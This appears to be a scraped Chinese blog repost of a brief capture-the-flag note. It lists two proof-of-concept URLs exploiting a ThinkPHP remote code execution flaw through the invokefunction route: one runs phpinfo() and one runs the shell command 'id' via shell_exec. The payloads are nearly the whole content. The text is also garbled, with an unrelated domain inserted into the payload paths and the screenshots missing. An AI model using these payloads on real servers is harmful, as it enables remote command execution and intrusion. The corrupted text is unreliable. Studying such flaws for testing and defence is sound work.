当前位置:首页 > Web开发 > 正文

构造POCPOC1 该poc会执行phpinfo() :8080/index.php?s=http://www.mam

2024-03-31 Web开发

技术图片

结构POC  POC1

该poc会执行phpinfo()

:8080/index.php?s=http://www.mamicode.com/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 # 将执行phpinfo()

技术图片

 POC2

该poc将会执行id命令

:25181/index.php?s=http://www.mamicode.com/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=id

技术图片

 爆出flag

技术图片

温馨提示: 本文由Jm博客推荐,转载请保留链接: https://www.jmwww.net/file/web/33083.html